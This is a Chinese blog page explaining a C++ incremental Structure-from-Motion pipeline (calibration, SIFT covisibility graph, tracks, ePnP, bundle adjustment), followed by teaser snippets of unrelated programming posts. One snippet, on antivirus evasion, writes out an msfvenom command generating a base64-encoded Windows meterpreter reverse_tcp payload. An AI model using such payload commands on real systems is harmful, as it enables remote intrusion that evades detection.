当前位置：首页 > news >正文

【三维重建】增量SFM系统

news 2025/12/15 1:52:30

在学习完鲁鹏老师的三维重建基础后，打算用C++代码复现一下增量SFM系统（https://github.com/ldx-star/SFM）。

本项目的最终目标就是通过相机拍摄的多视角视图获取三维点云。由于资金有效，博主使用的是相机是小米12。

先来看一下最终效果：
在这里插入图片描述
当然了，和开源系统比起来还是差很多的。

二、项目流程

整个项目大致可以分为三步：

相机标定
构建共视图
重建

接下来将逐步介绍这三个流程，以及其实现细节。

三、实现细节

手机相机的焦距一般是固定，我们在使用手机拍照时说的调焦其实是算法调焦。为什么避免这个问题，在用手机拍摄标定板时需要关闭手机的自动调焦。

以小米手机为例：
在这里插入图片描述
我们直接使用opencv提供的方法进行标定，如何想了解具体实现细节与源码可以参考博文相机标定原理

我们项目的提供的标定图，最终的重投影误差为0.25，并且我们拍摄图片所使用的是同一个相机，所以所有相机的初始内参全部一样。

2、构建共视图

共视图就是建立图与图间的特征匹配关系。

这部分使用的事opencv的SIFT特征匹配算法，详细原理见博文 SIFT特征检测

在共视图中，我们定义了以下结构：

struct Edge{bool flag;std::vector<cv::DMatch> matches;
};
struct Node{cv::Mat img;std::vector<cv::KeyPoint> keyPoints; // 特征点cv::Mat descriptors; // 特征描述符std::vector<Edge> edges; // 当前图与其他图的匹配关系std::vector<int> trick_id; 
};
class CommonView{std::vector<Node> _graph;std::vector<cv::Mat> _images;std::vector<std::list<std::pair<int,int>>> _tracks;
}

std::vector<cv::Mat> _images:用于存放8副原始视图。

std::vector<Node> _graph:用两个视图间的匹配关系，构建一个图结构

std::vector<std::list<std::pair<int,int>>> _tracks: 用于存放track

什么是track？

如图所示， $image_{k-1}$ 视图中的 $P_{(j,k-1)}$ 与$ image_{k} $视图中的$ P_{(j,k)}$ 是一对儿匹配点， $image_{k}$ 视图中的 $P_{(j,k)}$ 与 $image_{k+1}$ 视图中的 $P_{(j,k+1)}$ 是一对儿匹配点，这三个点表示的是显示同一个三维点，我们将这样的点集称为一个track，由三个点组成的点集就称track的值为3。为了使重建结果稳定，需要将track值小于2的匹配点去掉。一个track对应一个三维点。
std::vector<std::list<std::pair<int,int>>>:这个结构是什么意思？

std::list<std::pair<int,int>>:表示一个track的数据结构，std::pair<int,int>:表示的某一个视图的二维坐标，pair.first表示的是视图id，pair.second表示的是特征点id。

Node结构体

std::vector<cv::KeyPoint> keyPoints:用于存放特征点

cv::Mat descriptors:当前视图的特征描述符

std::vector<Edge> edges:当前图与其他图的匹配关系，例如 edges[2]就表示当前视图与视图2的匹配关系。

std::vector<int> trick_id: trick_id.size()==keyPoints.size()用于表示每个特征点属于哪一个track

Edge结构体

bool flag:用一个布尔值表示两幅视图是否可以用于重建，初始值设为true，在两个视图进行重建后将其设为false

std::vector<cv::DMatch>:表示两视图的匹配关系
在这里插入图片描述

3、重建

选取可用匹配点最多的两个视图，得到初始的重建结果（初始重建结果至关重要，会直接影响到整个重建效果）

初始重建步骤：
1. 计算基础矩阵（博文链接:对极几何）
2. 从基础矩阵中得到相机外参（博文链接：运动恢复结构）
3. 三角化，得到初始三维点（博文链接：三角化）
4. while(存在可以重建的视图)
  - 从剩余视图中选取与已重建点交集最多的点，通过ePnP求得相机外参（博文链接：ePnP）
  - 三角化
  - 利用已重建的三维点进行捆绑调整，最小化重投影误差(博文链接:捆绑调整)，这部分我们是调用Ceres库

四、结果
在这里插入图片描述

【三维重建】增量SFM系统

在学习完鲁鹏老师的三维重建基础后，打算用C代码复现一下增量SFM系统（https://github.com/ldx-star/SFM）。本项目的最终目标就是通过相机拍摄的多视角视图获取三维点云。由于资金有效，博主使用的是相机是小米12。先来看一下最终…...

编程日记 2024/6/11 16:42:47

PyTorch 维度变换-Tensor基本操作

以如下 tensor a 为例，展示常用的维度变换操作 >>> a torch.rand(4,3,28,28) >>> a.shape torch.Size([4, 3, 28, 28])view / reshape 两者功能完全相同: a.view(shape) >>> a.view(4,3,28*28) ## a.view(4,3,28,28) 可恢复squeeze…...

编程日记 2024/6/11 16:41:45

spring 事务失效的几种场景

一、背景在 springBoot 开发过程中，我们一般都是在业务方法上添加 Transactional 注解来让 spring 替我们管理事务，但在某些特定的场景下，添加完注解之后，事务是不生效的，接下来详细介绍下。二、方法不是 public 2…...

编程日记 2024/6/11 16:40:44

45岁程序员独白：中年打工人出路在哪里？

作为一名也是JAVA方向的互联网从业者，我发现周围超过40岁以上的同事，基本都是部门负责人或者高层，真正还在一线做开发或者当个小领导的，已经是凤毛麟角了。同事A今年刚满40，育有一儿一女，从进入公司到现在…...

编程日记 2024/6/11 16:39:42

深度探讨：为何训练精度不高却在测试中表现优异？

深度探讨：为何训练精度不高却在测试中表现优异？ 在深度学习领域，我们经常遇到这样一个看似矛盾的现象：模型在训练集上的精度不是特别高，但在测试集上却能达到出色的表现。这种情况虽然不是常规，但其背后的…...

编程日记 2024/6/11 16:36:38

动态内存管理＜C语言＞

导言在C语言学习阶段，指针、结构体和动态内存管理，是后期学习数据结构的最重要的三大知识模块，也是C语言比较难的知识模块，但是“天下无难事”，只要认真踏实的学习，也能解决，所以下文将介绍动态…...

编程日记 2024/6/11 16:34:35

第一百零二节 Java面向对象设计 - Java静态内部类

Java面向对象设计 - Java静态内部类静态成员类不是内部类在另一个类的主体中定义的成员类可以声明为静态。例子以下代码声明了顶级类A和静态成员类B： class A {// Static member classpublic static class B {// Body for class B goes here} }注意静态成…...

编程日记 2024/6/11 16:32:33

给自己Linux搞个『回收站』，防止文件误删除

linux没有像windows里一样的回收站，工作时候删除文件容易不小心删错，造成麻烦的后果。所以给自己整了个回收站： 文件删除，新建~/opts/move_to_trash.sh，然后在里面新增，将${your_name}改成你的用户名。同时…...

编程日记 2024/6/11 16:30:30

Springboot接收参数的21种方式

前言最近一直在忙着开发项目（ps：其实有些摆烂），好久没有更新博客了，打开csdn一看好多网友留言私信，继上篇博客（我是如何实现HttpGet请求传body参数的！），网友议论纷纷，各抒起见。今天正好抽出时间总结一下Springboot接受参数的21种方式（Post、Get、Delete），一并…...

编程日记 2024/6/11 16:29:27

打造出色开发者体验的十大原则

大约十年前我是一名CIO，当时我在评估一种技术解决方案，向潜在供应商的代表讲明了我们的主要需求。他展示了该公司的至少三款产品。每种工具都有各自的用户体验、开发方法和学习要求，但是解决我们的业务需求同时需要这三种工具。作为CIO&#…...

编程日记 2024/6/11 16:28:26

Vue3_对接腾讯云COS_大文件分片上传和下载

目录一、腾讯云后台配置二、安装SDK 1.script 引入方式 2.webpack 引入方式三、文件上传 1.new COS 实例 2.上传文件四、文件下载腾讯云官方文档： 腾讯云官方文档https://cloud.tencent.com/document/product/436/11459 一、腾讯云后台配置 1.登录对…...

编程日记 2024/6/11 16:21:19

单层加密都GG~ 目录 cs生成个python的payload 将shellcode进行base64编码执行上线代码 cs生成个python的payload msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhostIP lport6688 -f c cs生成c的也行. 将shellcode进行base64编码 import base64code …...

编程日记 2024/6/11 16:19:14

Python版与Java版城市天气信息爬取对比分析

在对比Python版和Java版城市天气信息爬取时，我们需要考虑多个方面，包括语言特性、库支持、代码简洁性、执行效率以及维护成本等。以下是对这两个版本进行的一些对比分析： 1. 语言特性 Python： 易于学习：Python的语法清…...

编程日记 2024/6/11 16:17:11

CSS真题合集（二）

CSS真题合集（二） 11. css3新增特性12. css3动画12.1 关键帧动画 (keyframes)12.2 animation12.3 transition12.4 transform 13. grid网格布局13.1 使用display: grid或display: inline-grid的HTML元素。13.2 定义网格13.3 13.4 自动填充和自动放置13.4 对…...

编程日记 2024/6/11 16:16:09

长期出汗困扰你？可能是肾合出了问题

想象一下，我们的身体是一座繁茂的秘密花园，每一寸肌肤、每一个细胞都是花园里的一朵花、一片叶。汗水，则是这花园中无声的语言，它讲述着我们的健康与否，也揭示着身体内部的微妙变化。在炎炎夏日，身体如盛开…...

编程日记 2024/6/11 16:15:08

Jmeter函数二次开发说明

jmeter 二次开发使用 jmeter二次开发实现方法使用maven依賴进行开发导入jmeter的maven依赖，需要和你使用的jmeter版本一致。  <dependency><groupId>org.ap…...

编程日记 2024/6/11 16:13:06

重新学习STM32（1）GPIO

概念简介 GPIO 是通用输入输出端口的简称，简单来说就是 STM32 可控制的引脚。STM32 芯片通过 GPIO 引脚与外部设备连接起来，从而实现与外部通讯、控制以及数据采集的功能。 GPIO被分成很多组，比如 GPIOA和GPIOB等。所有的 GPIO引脚都有基本的…...

编程日记 2024/6/11 16:06:58

React+TS前台项目实战（二）-- 路由配置 + 组件懒加载 + Error Boundary使用

文章目录前言一、路由配置和懒加载lazy的使用二、TS版本Error Boundary组件封装三、在layout组件中使用Suspense组件和错误边界组件总结前言本文将详细介绍项目中的页面路由配置和异步组件懒加载处理，以提高用户体验，实现过渡效果。一、路由配置和懒…...

编程日记 2024/6/11 16:01:52

成为电商低价神秘顾客访问员的必备条件（深圳神秘顾客公司）

电商低价神秘顾客需要具备以下条件，以确保能够执行有效的调查任务并为企业提供有价值的反馈： 1、细致的观察能力：神秘顾客访问员需要具备细致的观察能力，能够全面、细致地观察电商平台的购物流程、商品详情、服务细节等。这包括注…...

编程日记 2024/6/11 16:00:51

现货黄金交易多少克一手？国内外情况大不同

如果大家想参与国际市场上的现货黄金交易，就应该从它交易细则的入手，先彻底认识这个品种，因为它是来自欧美市场的投资方式，所以无论是从合约的计的单位，计价的货币，交易的具体时间，以及买卖过程…...

编程日记 2024/6/11 15:59:50

逻辑回归：给不确定性划界的分类大师

想象你是一名医生。面对患者的检查报告（肿瘤大小、血液指标），你需要做出一个**决定性判断**：恶性还是良性？这种“非黑即白”的抉择，正是**逻辑回归（Logistic Regression）** 的战场&a…...

编程新知 2025/10/27 21:25:04

Oracle查询表空间大小

1 查询数据库中所有的表空间以及表空间所占空间的大小 SELECTtablespace_name,sum( bytes ) / 1024 / 1024 FROMdba_data_files GROUP BYtablespace_name; 2 Oracle查询表空间大小及每个表所占空间的大小 SELECTtablespace_name,file_id,file_name,round( bytes / ( 1024 …...

编程新知 2025/11/8 0:24:13

FFmpeg 低延迟同屏方案

引言在实时互动需求激增的当下，无论是在线教育中的师生同屏演示、远程办公的屏幕共享协作，还是游戏直播的画面实时传输，低延迟同屏已成为保障用户体验的核心指标。FFmpeg 作为一款功能强大的多媒体框架，凭借其灵活的编解码、数据…...

编程新知 2025/11/4 6:26:59

macOS多出来了：Google云端硬盘、YouTube、表格、幻灯片、Gmail、Google文档等应用

文章目录问题现象问题原因解决办法问题现象 macOS启动台（Launchpad）多出来了：Google云端硬盘、YouTube、表格、幻灯片、Gmail、Google文档等应用。问题原因很明显，都是Google家的办公全家桶。这些应用并不是通过独立安装的…...

编程新知 2025/12/4 19:00:05

Java-41 深入浅出 Spring - 声明式事务的支持事务配置 XML模式 XML+注解模式

点一下关注吧！！！非常感谢！！持续更新！！！ 🚀 AI篇持续更新中！（长期更新） 目前2025年06月05日更新到： AI炼丹日志-28 - Aud…...

编程新知 2025/12/13 2:36:48

Linux 中如何提取压缩文件？

Linux 是一种流行的开源操作系统，它提供了许多工具来管理、压缩和解压缩文件。压缩文件有助于节省存储空间，使数据传输更快。本指南将向您展示如何在 Linux 中提取不同类型的压缩文件。 1. Unpacking ZIP Files ZIP 文件是非常常见的，要在 …...

编程新知 2025/12/11 7:49:52

【 java 虚拟机知识第一篇】

目录 1.内存模型 1.1.JVM内存模型的介绍 1.2.堆和栈的区别 1.3.栈的存储细节 1.4.堆的部分 1.5.程序计数器的作用 1.6.方法区的内容 1.7.字符串池 1.8.引用类型 1.9.内存泄漏与内存溢出 1.10.会出现内存溢出的结构 1.内存模型 1.1.JVM内存模型的介绍内存模型主要分…...

编程新知 2025/12/14 14:47:59

深入浅出Diffusion模型：从原理到实践的全方位教程

I. 引言：生成式AI的黎明 – Diffusion模型是什么？ 近年来，生成式人工智能（Generative AI）领域取得了爆炸性的进展，模型能够根据简单的文本提示创作出逼真的图像、连贯的文本，乃至更多令人惊叹的…...

编程新知 2025/9/12 5:25:46

OCR MLLM Evaluation

为什么需要评测体系？——背景与矛盾能干的事： 看清楚发票、身份证上的字（准确率>90%），速度飞快（眨眼间完成）。干不了的事： 碰到复杂表格（合并单元…...

编程新知 2025/10/6 15:50:41

CSS3相关知识点

CSS3相关知识点 CSS3私有前缀私有前缀私有前缀存在的意义常见浏览器的私有前缀 CSS3基本语法CSS3 新增长度单位CSS3 新增颜色设置方式CSS3 新增选择器CSS3 新增盒模型相关属性box-sizing 怪异盒模型resize调整盒子大小box-shadow 盒子阴影opacity 不透明度 CSS3 新增背景属性ba…...

编程新知 2025/12/9 9:21:13

【三维重建】增量SFM系统

二、项目流程

三、实现细节

2、构建共视图

3、重建

相关文章：

【三维重建】增量SFM系统

PyTorch 维度变换-Tensor基本操作

spring 事务失效的几种场景

45岁程序员独白：中年打工人出路在哪里？

深度探讨：为何训练精度不高却在测试中表现优异？

动态内存管理＜C语言＞

第一百零二节 Java面向对象设计 - Java静态内部类

给自己Linux搞个『回收站』，防止文件误删除

Springboot接收参数的21种方式

打造出色开发者体验的十大原则

Vue3_对接腾讯云COS_大文件分片上传和下载

python免杀--base64加密(GG)

Python版与Java版城市天气信息爬取对比分析

CSS真题合集（二）

长期出汗困扰你？可能是肾合出了问题

Jmeter函数二次开发说明

重新学习STM32（1）GPIO

React+TS前台项目实战（二）-- 路由配置 + 组件懒加载 + Error Boundary使用

成为电商低价神秘顾客访问员的必备条件（深圳神秘顾客公司）

现货黄金交易多少克一手？国内外情况大不同

逻辑回归：给不确定性划界的分类大师

Oracle查询表空间大小

FFmpeg 低延迟同屏方案

macOS多出来了：Google云端硬盘、YouTube、表格、幻灯片、Gmail、Google文档等应用

Java-41 深入浅出 Spring - 声明式事务的支持事务配置 XML模式 XML+注解模式

Linux 中如何提取压缩文件？

【 java 虚拟机知识第一篇】

深入浅出Diffusion模型：从原理到实践的全方位教程

OCR MLLM Evaluation

CSS3相关知识点